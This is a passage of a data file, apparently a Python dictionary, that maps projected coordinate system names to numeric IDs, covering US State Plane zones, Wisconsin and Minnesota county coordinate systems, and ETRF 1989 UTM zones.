'NAD_1983_StatePlane_New_York_West_FIPS_3103_Feet': 102717, 'NAD_1983_StatePlane_New_York_Long_Island_FIPS_3104_Feet': 102718, 'NAD_1983_StatePlane_North_Carolina_FIPS_3200_Feet': 102719, 'NAD_1983_StatePlane_North_Dakota_North_FIPS_3301_Feet': 102720, 'NAD_1983_StatePlane_North_Dakota_South_FIPS_3302_Feet': 102721, 'NAD_1983_StatePlane_Ohio_North_FIPS_3401_Feet': 102722, 'NAD_1983_StatePlane_Ohio_South_FIPS_3402_Feet': 102723, 'NAD_1983_StatePlane_Oklahoma_North_FIPS_3501_Feet': 102724, 'NAD_1983_StatePlane_Oklahoma_South_FIPS_3502_Feet': 102725, 'NAD_1983_StatePlane_Oregon_North_FIPS_3601_Feet': 102726, 'NAD_1983_StatePlane_Oregon_South_FIPS_3602_Feet': 102727, 'NAD_1983_StatePlane_Pennsylvania_North_FIPS_3701_Feet': 102728, 'NAD_1983_StatePlane_Pennsylvania_South_FIPS_3702_Feet': 102729, 'NAD_1983_StatePlane_Rhode_Island_FIPS_3800_Feet': 102730, 'NAD_1983_StatePlane_South_Carolina_FIPS_3900_Feet': 102733, 'NAD_1983_StatePlane_South_Dakota_North_FIPS_4001_Feet': 102734, 'NAD_1983_StatePlane_South_Dakota_South_FIPS_4002_Feet': 102735, 'NAD_1983_StatePlane_Tennessee_FIPS_4100_Feet': 102736, 'NAD_1983_StatePlane_Texas_North_FIPS_4201_Feet': 102737, 'NAD_1983_StatePlane_Texas_North_Central_FIPS_4202_Feet': 102738, 'NAD_1983_StatePlane_Texas_Central_FIPS_4203_Feet': 102739, 'NAD_1983_StatePlane_Texas_South_Central_FIPS_4204_Feet': 102740, 'NAD_1983_StatePlane_Texas_South_FIPS_4205_Feet': 102741, 'NAD_1983_StatePlane_Utah_North_FIPS_4301_Feet': 102742, 'NAD_1983_StatePlane_Utah_Central_FIPS_4302_Feet': 102743, 'NAD_1983_StatePlane_Utah_South_FIPS_4303_Feet': 102744, 'NAD_1983_StatePlane_Vermont_FIPS_4400_Feet': 102745, 'NAD_1983_StatePlane_Virginia_North_FIPS_4501_Feet': 102746, 'NAD_1983_StatePlane_Virginia_South_FIPS_4502_Feet': 102747, 'NAD_1983_StatePlane_Washington_North_FIPS_4601_Feet': 102748, 'NAD_1983_StatePlane_Washington_South_FIPS_4602_Feet': 102749, 'NAD_1983_StatePlane_West_Virginia_North_FIPS_4701_Feet': 102750, 'NAD_1983_StatePlane_West_Virginia_South_FIPS_4702_Feet': 102751, 'NAD_1983_StatePlane_Wisconsin_North_FIPS_4801_Feet': 102752, 'NAD_1983_StatePlane_Wisconsin_Central_FIPS_4802_Feet': 102753, 'NAD_1983_StatePlane_Wisconsin_South_FIPS_4803_Feet': 102754, 'NAD_1983_StatePlane_Wyoming_East_FIPS_4901_Feet': 102755, 'NAD_1983_StatePlane_Wyoming_East_Central_FIPS_4902_Feet': 102756, 'NAD_1983_StatePlane_Wyoming_West_Central_FIPS_4903_Feet': 102757, 'NAD_1983_StatePlane_Wyoming_West_FIPS_4904_Feet': 102758, 'NAD_1983_StatePlane_Puerto_Rico_Virgin_Islands_FIPS_5200_Feet': 102761, 'NAD_1983_StatePlane_Kentucky_FIPS_1600_Feet': 102763, 'NAD_1983_StatePlane_Guam_FIPS_5400_Feet': 102766, 'NAD_1983_HARN_WISCRS_Adams_County_Meters': 103300, 'NAD_1983_HARN_WISCRS_Ashland_County_Meters': 103301, 'NAD_1983_HARN_WISCRS_Barron_County_Meters': 103302, 'NAD_1983_HARN_WISCRS_Bayfield_County_Meters': 103303, 'NAD_1983_HARN_WISCRS_Brown_County_Meters': 103304, 'NAD_1983_HARN_WISCRS_Buffalo_County_Meters': 103305, 'NAD_1983_HARN_WISCRS_Burnett_County_Meters': 103306, 'NAD_1983_HARN_WISCRS_Calumet_County_Meters': 103307, 'NAD_1983_HARN_WISCRS_Chippewa_County_Meters': 103308, 'NAD_1983_HARN_WISCRS_Clark_County_Meters': 103309, 'NAD_1983_HARN_WISCRS_Columbia_County_Meters': 103310, 'NAD_1983_HARN_WISCRS_Crawford_County_Meters': 103311, 'NAD_1983_HARN_WISCRS_Dane_County_Meters': 103312, 'NAD_1983_HARN_WISCRS_Dodge_County_Meters': 103313, 'NAD_1983_HARN_WISCRS_Door_County_Meters': 103314, 'NAD_1983_HARN_WISCRS_Douglas_County_Meters': 103315, 'NAD_1983_HARN_WISCRS_Dunn_County_Meters': 103316, 'NAD_1983_HARN_WISCRS_EauClaire_County_Meters': 103317, 'NAD_1983_HARN_WISCRS_Florence_County_Meters': 103318, 'NAD_1983_HARN_WISCRS_Fond_du_Lac_County_Meters': 103319, 'NAD_1983_HARN_WISCRS_Forest_County_Meters': 103320, 'NAD_1983_HARN_WISCRS_Grant_County_Meters': 103321, 'NAD_1983_HARN_WISCRS_Green_County_Meters': 103322, 'NAD_1983_HARN_WISCRS_GreenLake_County_Meters': 103323, 'NAD_1983_HARN_WISCRS_Iowa_County_Meters': 103324, 'NAD_1983_HARN_WISCRS_Iron_County_Meters': 103325, 'NAD_1983_HARN_WISCRS_Jackson_County_Meters': 103326, 'NAD_1983_HARN_WISCRS_Jefferson_County_Meters': 103327, 'NAD_1983_HARN_WISCRS_Juneau_County_Meters': 103328, 'NAD_1983_HARN_WISCRS_Kenosha_County_Meters': 103329, 'NAD_1983_HARN_WISCRS_Kewaunee_County_Meters': 103330, 'NAD_1983_HARN_WISCRS_LaCrosse_County_Meters': 103331, 'NAD_1983_HARN_WISCRS_Lafayette_County_Meters': 103332, 'NAD_1983_HARN_WISCRS_Langlade_County_Meters': 103333, 'NAD_1983_HARN_WISCRS_Lincoln_County_Meters': 103334, 'NAD_1983_HARN_WISCRS_Manitowoc_County_Meters': 103335, 'NAD_1983_HARN_WISCRS_Marathon_County_Meters': 103336, 'NAD_1983_HARN_WISCRS_Marinette_County_Meters': 103337, 'NAD_1983_HARN_WISCRS_Marquette_County_Meters': 103338, 'NAD_1983_HARN_WISCRS_Menominee_County_Meters': 103339, 'NAD_1983_HARN_WISCRS_Milwaukee_County_Meters': 103340, 'NAD_1983_HARN_WISCRS_Monroe_County_Meters': 103341, 'NAD_1983_HARN_WISCRS_Oconto_County_Meters': 103342, 'NAD_1983_HARN_WISCRS_Oneida_County_Meters': 103343, 'NAD_1983_HARN_WISCRS_Outagamie_County_Meters': 103344, 'NAD_1983_HARN_WISCRS_Ozaukee_County_Meters': 103345, 'NAD_1983_HARN_WISCRS_Pepin_County_Meters': 103346, 'NAD_1983_HARN_WISCRS_Pierce_County_Meters': 103347, 'NAD_1983_HARN_WISCRS_Polk_County_Meters': 103348, 'NAD_1983_HARN_WISCRS_Portage_County_Meters': 103349, 'NAD_1983_HARN_WISCRS_Price_County_Meters': 103350, 'NAD_1983_HARN_WISCRS_Racine_County_Meters': 103351, 'NAD_1983_HARN_WISCRS_Richland_County_Meters': 103352, 'NAD_1983_HARN_WISCRS_Rock_County_Meters': 103353, 'NAD_1983_HARN_WISCRS_Rusk_County_Meters': 103354, 'NAD_1983_HARN_WISCRS_Sauk_County_Meters': 103355, 'NAD_1983_HARN_WISCRS_Sawyer_County_Meters': 103356, 'NAD_1983_HARN_WISCRS_Shawano_County_Meters': 103357, 'NAD_1983_HARN_WISCRS_Sheboygan_County_Meters': 103358, 'NAD_1983_HARN_WISCRS_St_Croix_County_Meters': 103359, 'NAD_1983_HARN_WISCRS_Taylor_County_Meters': 103360, 'NAD_1983_HARN_WISCRS_Trempealeau_County_Meters': 103361, 'NAD_1983_HARN_WISCRS_Vernon_County_Meters': 103362, 'NAD_1983_HARN_WISCRS_Vilas_County_Meters': 103363, 'NAD_1983_HARN_WISCRS_Walworth_County_Meters': 103364, 'NAD_1983_HARN_WISCRS_Washburn_County_Meters': 103365, 'NAD_1983_HARN_WISCRS_Washington_County_Meters': 103366, 'NAD_1983_HARN_WISCRS_Waukesha_County_Meters': 103367, 'NAD_1983_HARN_WISCRS_Waupaca_County_Meters': 103368, 'NAD_1983_HARN_WISCRS_Waushara_County_Meters': 103369, 'NAD_1983_HARN_WISCRS_Winnebago_County_Meters': 103370, 'NAD_1983_HARN_WISCRS_Wood_County_Meters': 103371, 'NAD_1983_HARN_WISCRS_Adams_County_Feet': 103400, 'NAD_1983_HARN_WISCRS_Ashland_County_Feet': 103401, 'NAD_1983_HARN_WISCRS_Barron_County_Feet': 103402, 'NAD_1983_HARN_WISCRS_Bayfield_County_Feet': 103403, 'NAD_1983_HARN_WISCRS_Brown_County_Feet': 103404, 'NAD_1983_HARN_WISCRS_Buffalo_County_Feet': 103405, 'NAD_1983_HARN_WISCRS_Burnett_County_Feet': 103406, 'NAD_1983_HARN_WISCRS_Calumet_County_Feet': 103407, 'NAD_1983_HARN_WISCRS_Chippewa_County_Feet': 103408, 'NAD_1983_HARN_WISCRS_Clark_County_Feet': 103409, 'NAD_1983_HARN_WISCRS_Columbia_County_Feet': 103410, 'NAD_1983_HARN_WISCRS_Crawford_County_Feet': 103411, 'NAD_1983_HARN_WISCRS_Dane_County_Feet': 103412, 'NAD_1983_HARN_WISCRS_Dodge_County_Feet': 103413, 'NAD_1983_HARN_WISCRS_Door_County_Feet': 103414, 'NAD_1983_HARN_WISCRS_Douglas_County_Feet': 103415, 'NAD_1983_HARN_WISCRS_Dunn_County_Feet': 103416, 'NAD_1983_HARN_WISCRS_EauClaire_County_Feet': 103417, 'NAD_1983_HARN_WISCRS_Florence_County_Feet': 103418, 'NAD_1983_HARN_WISCRS_Fond_du_Lac_County_Feet': 103419, 'NAD_1983_HARN_WISCRS_Forest_County_Feet': 103420, 'NAD_1983_HARN_WISCRS_Grant_County_Feet': 103421, 'NAD_1983_HARN_WISCRS_Green_County_Feet': 103422, 'NAD_1983_HARN_WISCRS_GreenLake_County_Feet': 103423, 'NAD_1983_HARN_WISCRS_Iowa_County_Feet': 103424, 'NAD_1983_HARN_WISCRS_Iron_County_Feet': 103425, 'NAD_1983_HARN_WISCRS_Jackson_County_Feet': 103426, 'NAD_1983_HARN_WISCRS_Jefferson_County_Feet': 103427, 'NAD_1983_HARN_WISCRS_Juneau_County_Feet': 103428, 'NAD_1983_HARN_WISCRS_Kenosha_County_Feet': 103429, 'NAD_1983_HARN_WISCRS_Kewaunee_County_Feet': 103430, 'NAD_1983_HARN_WISCRS_LaCrosse_County_Feet': 103431, 'NAD_1983_HARN_WISCRS_Lafayette_County_Feet': 103432, 'NAD_1983_HARN_WISCRS_Langlade_County_Feet': 103433, 'NAD_1983_HARN_WISCRS_Lincoln_County_Feet': 103434, 'NAD_1983_HARN_WISCRS_Manitowoc_County_Feet': 103435, 'NAD_1983_HARN_WISCRS_Marathon_County_Feet': 103436, 'NAD_1983_HARN_WISCRS_Marinette_County_Feet': 103437, 'NAD_1983_HARN_WISCRS_Marquette_County_Feet': 103438, 'NAD_1983_HARN_WISCRS_Menominee_County_Feet': 103439, 'NAD_1983_HARN_WISCRS_Milwaukee_County_Feet': 103440, 'NAD_1983_HARN_WISCRS_Monroe_County_Feet': 103441, 'NAD_1983_HARN_WISCRS_Oconto_County_Feet': 103442, 'NAD_1983_HARN_WISCRS_Oneida_County_Feet': 103443, 'NAD_1983_HARN_WISCRS_Outagamie_County_Feet': 103444, 'NAD_1983_HARN_WISCRS_Ozaukee_County_Feet': 103445, 'NAD_1983_HARN_WISCRS_Pepin_County_Feet': 103446, 'NAD_1983_HARN_WISCRS_Pierce_County_Feet': 103447, 'NAD_1983_HARN_WISCRS_Polk_County_Feet': 103448, 'NAD_1983_HARN_WISCRS_Portage_County_Feet': 103449, 'NAD_1983_HARN_WISCRS_Price_County_Feet': 103450, 'NAD_1983_HARN_WISCRS_Racine_County_Feet': 103451, 'NAD_1983_HARN_WISCRS_Richland_County_Feet': 103452, 'NAD_1983_HARN_WISCRS_Rock_County_Feet': 103453, 'NAD_1983_HARN_WISCRS_Rusk_County_Feet': 103454, 'NAD_1983_HARN_WISCRS_Sauk_County_Feet': 103455, 'NAD_1983_HARN_WISCRS_Sawyer_County_Feet': 103456, 'NAD_1983_HARN_WISCRS_Shawano_County_Feet': 103457, 'NAD_1983_HARN_WISCRS_Sheboygan_County_Feet': 103458, 'NAD_1983_HARN_WISCRS_St_Croix_County_Feet': 103459, 'NAD_1983_HARN_WISCRS_Taylor_County_Feet': 103460, 'NAD_1983_HARN_WISCRS_Trempealeau_County_Feet': 103461, 'NAD_1983_HARN_WISCRS_Vernon_County_Feet': 103462, 'NAD_1983_HARN_WISCRS_Vilas_County_Feet': 103463, 'NAD_1983_HARN_WISCRS_Walworth_County_Feet': 103464, 'NAD_1983_HARN_WISCRS_Washburn_County_Feet': 103465, 'NAD_1983_HARN_WISCRS_Washington_County_Feet': 103466, 'NAD_1983_HARN_WISCRS_Waukesha_County_Feet': 103467, 'NAD_1983_HARN_WISCRS_Waupaca_County_Feet': 103468, 'NAD_1983_HARN_WISCRS_Waushara_County_Feet': 103469, 'NAD_1983_HARN_WISCRS_Winnebago_County_Feet': 103470, 'NAD_1983_HARN_WISCRS_Wood_County_Feet': 103471, 'ETRF_1989_UTM_Zone_28N': 103528, 'ETRF_1989_UTM_Zone_29N': 103529, 'ETRF_1989_UTM_Zone_30N': 103530, 'ETRF_1989_UTM_Zone_31N': 103531, 'ETRF_1989_UTM_Zone_32N': 103532, 'ETRF_1989_UTM_Zone_33N': 103533, 'ETRF_1989_UTM_Zone_34N': 103534, 'ETRF_1989_UTM_Zone_35N': 103535, 'ETRF_1989_UTM_Zone_36N': 103536, 'ETRF_1989_UTM_Zone_37N': 103537, 'ETRF_1989_UTM_Zone_38N': 103538, 'ETRF_1989_TM_Baltic_1993': 103584, 'NAD_1983_HARN_Adj_MN_Aitkin_Meters': 103600, 'NAD_1983_HARN_Adj_MN_Clay_Meters': 103601, 'NAD_1983_HARN_Adj_MN_Clearwater_Meters': 103602, 'NAD_1983_HARN_Adj_MN_Hubbard_Meters': 103603, 'NAD_1983_HARN_Adj_MN_Lake_Meters': 103604, 'NAD_1983_HARN_Adj_MN_Mille_Lacs_Meters': 103605, 'NAD_1983_HARN_Adj_MN_Washington_Meters': 103606, 'NAD_1983_HARN_Adj_MN_Wilkin_Meters': 103607, 'NAD_1983_HARN_Adj_MN_Anoka_Meters': 103608, 'NAD_1983_HARN_Adj_MN_Becker_Meters': 103609, 'NAD_1983_HARN_Adj_MN_Beltrami_North_Meters': 103610, 'NAD_1983_HARN_Adj_MN_Beltrami_South_Meters': 103611, 'NAD_1983_HARN_Adj_MN_Benton_Meters': 103612, 'NAD_1983_HARN_Adj_MN_Big_Stone_Meters': 103613, 'NAD_1983_HARN_Adj_MN_Blue_Earth_Meters': 103614, 'NAD_1983_HARN_Adj_MN_Brown_Meters': 103615, 'NAD_1983_HARN_Adj_MN_Carlton_Meters': 103616, 'NAD_1983_HARN_Adj_MN_Carver_Meters': 103617, 'NAD_1983_HARN_Adj_MN_Cass_North_Meters': 103618, 'NAD_1983_HARN_Adj_MN_Cass_South_Meters': 103619, 'NAD_1983_HARN_Adj_MN_Chippewa_Meters': 103620, 'NAD_1983_HARN_Adj_MN_Chisago_Meters': 103621, 'NAD_1983_HARN_Adj_MN_Cook_North_Meters': 103622, 'NAD_1983_HARN_Adj_MN_Cook_South_Meters': 103623, 'NAD_1983_HARN_Adj_MN_Cottonwood_Meters': 103624, 'NAD_1983_HARN_Adj_MN_Crow_Wing_Meters': 103625, 'NAD_1983_HARN_Adj_MN_Dakota_Meters': 103626, 'NAD_1983_HARN_Adj_MN_Dodge_Meters': 103627, 'NAD_1983_HARN_Adj_MN_Douglas_Meters': 103628, 'NAD_1983_HARN_Adj_MN_Faribault_Meters': 103629, 'NAD_1983_HARN_Adj_MN_Fillmore_Meters': 103630, 'NAD_1983_HARN_Adj_MN_Freeborn_Meters': 103631, 'NAD_1983_HARN_Adj_MN_Goodhue_Meters': 103632, 'NAD_1983_HARN_Adj_MN_Grant_Meters': 103633, 'NAD_1983_HARN_Adj_MN_Hennepin_Meters': 103634, 'NAD_1983_HARN_Adj_MN_Houston_Meters': 103635, 'NAD_1983_HARN_Adj_MN_Isanti_Meters': 103636, 'NAD_1983_HARN_Adj_MN_Itasca_North_Meters': 103637, 'NAD_1983_HARN_Adj_MN_Itasca_South_Meters': 103638, 'NAD_1983_HARN_Adj_MN_Jackson_Meters': 103639, 'NAD_1983_HARN_Adj_MN_Kanabec_Meters': 103640, 'NAD_1983_HARN_Adj_MN_Kandiyohi_Meters': 103641, 'NAD_1983_HARN_Adj_MN_Kittson_Meters': 103642, 'NAD_1983_HARN_Adj_MN_Koochiching_Meters': 103643, 'NAD_1983_HARN_Adj_MN_Lac_Qui_Parle_Meters': 103644, 'NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_North_Meters': 103645, 'NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_South_Meters': 103646, 'NAD_1983_HARN_Adj_MN_Le_Sueur_Meters': 103647, 'NAD_1983_HARN_Adj_MN_Lincoln_Meters': 103648, 'NAD_1983_HARN_Adj_MN_Lyon_Meters': 103649, 'NAD_1983_HARN_Adj_MN_McLeod_Meters': 103650, 'NAD_1983_HARN_Adj_MN_Mahnomen_Meters': 103651, 'NAD_1983_HARN_Adj_MN_Marshall_Meters': 103652, 'NAD_1983_HARN_Adj_MN_Martin_Meters': 103653, 'NAD_1983_HARN_Adj_MN_Meeker_Meters': 103654, 'NAD_1983_HARN_Adj_MN_Morrison_Meters': 103655, 'NAD_1983_HARN_Adj_MN_Mower_Meters': 103656, 'NAD_1983_HARN_Adj_MN_Murray_Meters': 103657, 'NAD_1983_HARN_Adj_MN_Nicollet_Meters': 103658, 'NAD_1983_HARN_Adj_MN_Nobles_Meters': 103659, 'NAD_1983_HARN_Adj_MN_Norman_Meters': 103660, 'NAD_1983_HARN_Adj_MN_Olmsted_Meters': 103661, 'NAD_1983_HARN_Adj_MN_Ottertail_Meters': 103662, 'NAD_1983_HARN_Adj_MN_Pennington_Meters': 103663, 'NAD_1983_HARN_Adj_MN_Pine_Meters': 103664, 'NAD_1983_HARN_Adj_MN_Pipestone_Meters': 103665, 'NAD_1983_HARN_Adj_MN_Polk_Meters': 103666, 'NAD_1983_HARN_Adj_MN_Pope_Meters': 103667, 'NAD_1983_HARN_Adj_MN_Ramsey_Meters': 103668, 'NAD_1983_HARN_Adj_MN_Red_Lake_Meters': 103669, 'NAD_1983_HARN_Adj_MN_Redwood_Meters': 103670, 'NAD_1983_HARN_Adj_MN_Renville_Meters': 103671, 'NAD_1983_HARN_Adj_MN_Rice_Meters': 103672, 'NAD_1983_HARN_Adj_MN_Rock_Meters': 103673, 'NAD_1983_HARN_Adj_MN_Roseau_Meters': 103674, 'NAD_1983_HARN_Adj_MN_St_Louis_North_Meters': 103675, 'NAD_1983_HARN_Adj_MN_St_Louis_Central_Meters': 103676, 'NAD_1983_HARN_Adj_MN_St_Louis_South_Meters': 103677, 'NAD_1983_HARN_Adj_MN_Scott_Meters': 103678, 'NAD_1983_HARN_Adj_MN_Sherburne_Meters': 103679, 'NAD_1983_HARN_Adj_MN_Sibley_Meters': 103680, 'NAD_1983_HARN_Adj_MN_Stearns_Meters': 103681, 'NAD_1983_HARN_Adj_MN_Steele_Meters': 103682, 'NAD_1983_HARN_Adj_MN_Stevens_Meters': 103683, 'NAD_1983_HARN_Adj_MN_Swift_Meters': 103684, 'NAD_1983_HARN_Adj_MN_Todd_Meters': 103685, 'NAD_1983_HARN_Adj_MN_Traverse_Meters': 103686, 'NAD_1983_HARN_Adj_MN_Wabasha_Meters': 103687, 'NAD_1983_HARN_Adj_MN_Wadena_Meters': 103688, 'NAD_1983_HARN_Adj_MN_Waseca_Meters': 103689, 'NAD_1983_HARN_Adj_MN_Watonwan_Meters': 103690, 'NAD_1983_HARN_Adj_MN_Winona_Meters': 103691, 'NAD_1983_HARN_Adj_MN_Wright_Meters': 103692, 'NAD_1983_HARN_Adj_MN_Yellow_Medicine_Meters': 103693, 'NAD_1983_HARN_Adj_MN_Aitkin_Feet': 103700, 'NAD_1983_HARN_Adj_MN_Clay_Feet': 103701, 'NAD_1983_HARN_Adj_MN_Clearwater_Feet': 103702, 'NAD_1983_HARN_Adj_MN_Hubbard_Feet': 103703, 'NAD_1983_HARN_Adj_MN_Lake_Feet': 103704, 'NAD_1983_HARN_Adj_MN_Mille_Lacs_Feet': 103705, 'NAD_1983_HARN_Adj_MN_Washington_Feet': 103706, 'NAD_1983_HARN_Adj_MN_Wilkin_Feet': 103707, 'NAD_1983_HARN_Adj_MN_Anoka_Feet': 103708, 'NAD_1983_HARN_Adj_MN_Becker_Feet': 103709, 'NAD_1983_HARN_Adj_MN_Beltrami_North_Feet': 103710, 'NAD_1983_HARN_Adj_MN_Beltrami_South_Feet': 103711, 'NAD_1983_HARN_Adj_MN_Benton_Feet': 103712, 'NAD_1983_HARN_Adj_MN_Big_Stone_Feet': 103713, 'NAD_1983_HARN_Adj_MN_Blue_Earth_Feet': 103714, 'NAD_1983_HARN_Adj_MN_Brown_Feet': 103715, 'NAD_1983_HARN_Adj_MN_Carlton_Feet': 103716, 'NAD_1983_HARN_Adj_MN_Carver_Feet': 103717, 'NAD_1983_HARN_Adj_MN_Cass_North_Feet': 103718, 'NAD_1983_HARN_Adj_MN_Cass_South_Feet': 103719, 'NAD_1983_HARN_Adj_MN_Chippewa_Feet': 103720, 'NAD_1983_HARN_Adj_MN_Chisago_Feet': 103721, 'NAD_1983_HARN_Adj_MN_Cook_North_Feet': 103722, 'NAD_1983_HARN_Adj_MN_Cook_South_Feet': 103723, 'NAD_1983_HARN_Adj_MN_Cottonwood_Feet': 103724, 'NAD_1983_HARN_Adj_MN_Crow_Wing_Feet': 103725, 'NAD_1983_HARN_Adj_MN_Dakota_Feet': 103726, 'NAD_1983_HARN_Adj_MN_Dodge_Feet': 103727, 'NAD_1983_HARN_Adj_MN_Douglas_Feet': 103728, 'NAD_1983_HARN_Adj_MN_Faribault_Feet': 103729, 'NAD_1983_HARN_Adj_MN_Fillmore_Feet': 103730, 'NAD_1983_HARN_Adj_MN_Freeborn_Feet': 103731, 'NAD_1983_HARN_Adj_MN_Goodhue_Feet': 103732, 'NAD_1983_HARN_Adj_MN_Grant_Feet': 103733, 'NAD_1983_HARN_Adj_MN_Hennepin_Feet': 103734, 'NAD_1983_HARN_Adj_MN_Houston_Feet': 103735, 'NAD_1983_HARN_Adj_MN_Isanti_Feet': 103736, 'NAD_1983_HARN_Adj_MN_Itasca_North_Feet': 103737, 'NAD_1983_HARN_Adj_MN_Itasca_South_Feet': 103738, 'NAD_1983_HARN_Adj_MN_Jackson_Feet': 103739, 'NAD_1983_HARN_Adj_MN_Kanabec_Feet': 103740, 'NAD_1983_HARN_Adj_MN_Kandiyohi_Feet': 103741, 'NAD_1983_HARN_Adj_MN_Kittson_Feet': 103742, 'NAD_1983_HARN_Adj_MN_Koochiching_Feet': 103743, 'NAD_1983_HARN_Adj_MN_Lac_Qui_Parle_Feet': 103744, 'NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_North_Feet': 103745, 'NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_South_Feet': 103746, 'NAD_1983_HARN_Adj_MN_Le_Sueur_Feet': 103747, 'NAD_1983_HARN_Adj_MN_Lincoln_Feet': 103748, 'NAD_1983_HARN_Adj_MN_Lyon_Feet': 103749, 'NAD_1983_HARN_Adj_MN_McLeod_Feet': 103750, 'NAD_1983_HARN_Adj_MN_Mahnomen_Feet': 103751, 'NAD_1983_HARN_Adj_MN_Marshall_Feet': 103752, 'NAD_1983_HARN_Adj_MN_Martin_Feet': 103753, 'NAD_1983_HARN_Adj_MN_Meeker_Feet': 103754, 'NAD_1983_HARN_Adj_MN_Morrison_Feet': 103755, 'NAD_1983_HARN_Adj_MN_Mower_Feet': 103756, 'NAD_1983_HARN_Adj_MN_Murray_Feet': 103757, 'NAD_1983_HARN_Adj_MN_Nicollet_Feet': 103758, 'NAD_1983_HARN_Adj_MN_Nobles_Feet': 103759, 'NAD_1983_HARN_Adj_MN_Norman_Feet': 103760, 'NAD_1983_HARN_Adj_MN_Olmsted_Feet': 103761, 'NAD_1983_HARN_Adj_MN_Ottertail_Feet': 103762, 'NAD_1983_HARN_Adj_MN_Pennington_Feet': 103763, 'NAD_1983_HARN_Adj_MN_Pine_Feet': 103764, 'NAD_1983_HARN_Adj_MN_Pipestone_Feet': 103765, 'NAD_1983_HARN_Adj_MN_Polk_Feet': 103766, 'NAD_1983_HARN_Adj_MN_Pope_Feet': 103767, 'NAD_1983_HARN_Adj_MN_Ramsey_Feet': 103768, 'NAD_1983_HARN_Adj_MN_Red_Lake_Feet': 103769, 'NAD_1983_HARN_Adj_MN_Redwood_Feet': 103770, 'NAD_1983_HARN_Adj_MN_Renville_Feet': 103771, 'NAD_1983_HARN_Adj_MN_Rice_Feet': 103772, 'NAD_1983_HARN_Adj_MN_Rock_Feet': 103773, 'NAD_1983_HARN_Adj_MN_Roseau_Feet': 103774, 'NAD_1983_HARN_Adj_MN_St_Louis_North_Feet': 103775, 'NAD_1983_HARN_Adj_MN_St_Louis_Central_Feet': 103776, 'NAD_1983_HARN_Adj_MN_St_Louis_South_Feet': 103777, 'NAD_1983_HARN_Adj_MN_Scott_Feet': 103778, 'NAD_1983_HARN_Adj_MN_Sherburne_Feet': 103779, 'NAD_1983_HARN_Adj_MN_Sibley_Feet': 103780, 'NAD_1983_HARN_Adj_MN_Stearns_Feet': 103781, 'NAD_1983_HARN_Adj_MN_Steele_Feet': 103782, 'NAD_1983_HARN_Adj_MN_Stevens_Feet': 103783, 'NAD_1983_HARN_Adj_MN_Swift_Feet': 103784, 'NAD_1983_HARN_Adj_MN_Todd_Feet': 103785, 'NAD_1983_HARN_Adj_MN_Traverse_Feet': 103786, 'NAD_1983_HARN_Adj_MN_Wabasha_Feet': 103787, 'NAD_1983_HARN_Adj_MN_Wadena_Feet': 103788, 'NAD_1983_HARN_Adj_MN_Waseca_Feet': 103789, 'NAD_1983_HARN_Adj_MN_Watonwan_Feet': 103790, 'NAD_1983_HARN_Adj_MN_Winona_Feet': 103791, 'NAD_1983_HARN_Adj_MN_Wright_Feet': 103792, 'NAD_1983_HARN_Adj_MN_Yellow_Medicine_Feet': 103793, 'NAD_1983_HARN_Adj_WI_Adams_Meters': 103800, 'NAD_1983_HARN_Adj_WI_Ashland_Meters': 103801, 'NAD_1983_HARN_Adj_WI_Barron_Meters': 103802, 'NAD_1983_HARN_Adj_WI_Brown_Meters': 103803, 'NAD_1983_HARN_Adj_WI_Buffalo_Meters': 103804, 'NAD_1983_HARN_Adj_WI_Calumet_Meters': 103805, 'NAD_1983_HARN_Adj_WI_Clark_Meters': 103806, 'NAD_1983_HARN_Adj_WI_Dodge_Meters': 103807, 'NAD_1983_HARN_Adj_WI_Door_Meters': 103808, 'NAD_1983_HARN_Adj_WI_Douglas_Meters': 103809, 'NAD_1983_HARN_Adj_WI_Dunn_Meters': 103810, 'NAD_1983_HARN_Adj_WI_Florence_Meters': 103811, 'NAD_1983_HARN_Adj_WI_Fond_du_Lac_Meters': 103812, 'NAD_1983_HARN_Adj_WI_Forest_Meters': 103813, 'NAD_1983_HARN_Adj_WI_Grant_Meters': 103814, 'NAD_1983_HARN_Adj_WI_Iowa_Meters': 103815, 'NAD_1983_HARN_Adj_WI_Iron_Meters': 103816, 'NAD_1983_HARN_Adj_WI_Jefferson_Meters': 103817, 'NAD_1983_HARN_Adj_WI_Juneau_Meters': 103818, 'NAD_1983_HARN_Adj_WI_Kenosha_Meters': 103819, 'NAD_1983_HARN_Adj_WI_Kewaunee_Meters': 103820, 'NAD_1983_HARN_Adj_WI_LaCrosse_Meters': 103821, 'NAD_1983_HARN_Adj_WI_Lincoln_Meters': 103822, 'NAD_1983_HARN_Adj_WI_Manitowoc_Meters': 103823, 'NAD_1983_HARN_Adj_WI_Marinette_Meters': 103824, 'NAD_1983_HARN_Adj_WI_Menominee_Meters': 103825, 'NAD_1983_HARN_Adj_WI_Milwaukee_Meters': 103826, 'NAD_1983_HARN_Adj_WI_Oconto_Meters': 103827, 'NAD_1983_HARN_Adj_WI_Outagamie_Meters': 103828, 'NAD_1983_HARN_Adj_WI_Ozaukee_Meters': 103829, 'NAD_1983_HARN_Adj_WI_Polk_Meters': 103830, 'NAD_1983_HARN_Adj_WI_Price_Meters': 103831, 'NAD_1983_HARN_Adj_WI_Racine_Meters': 103832, 'NAD_1983_HARN_Adj_WI_Rock_Meters': 103833, 'NAD_1983_HARN_Adj_WI_Rusk_Meters': 103834, 'NAD_1983_HARN_Adj_WI_St_Croix_Meters': 103835, 'NAD_1983_HARN_Adj_WI_Sauk_Meters': 103836, 'NAD_1983_HARN_Adj_WI_Shawano_Meters': 103837, 'NAD_1983_HARN_Adj_WI_Sheboygan_Meters': 103838, 'NAD_1983_HARN_Adj_WI_Trempealeau_Meters': 103839, 'NAD_1983_HARN_Adj_WI_Washington_Meters': 103840, 'NAD_1983_HARN_Adj_WI_Waukesha_Meters': 103841, 'NAD_1983_HARN_Adj_WI_Waupaca_Meters': 103842, 'NAD_1983_HARN_Adj_WI_Winnebago_Meters': 103843, 'NAD_1983_HARN_Adj_WI_Bayfield_Meters': 103844, 'NAD_1983_HARN_Adj_WI_Burnett_Meters': 103845, 'NAD_1983_HARN_Adj_WI_Chippewa_Meters': 103846, 'NAD_1983_HARN_Adj_WI_Columbia_Meters': 103847, 'NAD_1983_HARN_Adj_WI_Crawford_Meters': 103848, 'NAD_1983_HARN_Adj_WI_Dane_Meters': 103849, 'NAD_1983_HARN_Adj_WI_EauClaire_Meters': 103850, 'NAD_1983_HARN_Adj_WI_Green_Meters': 103851, 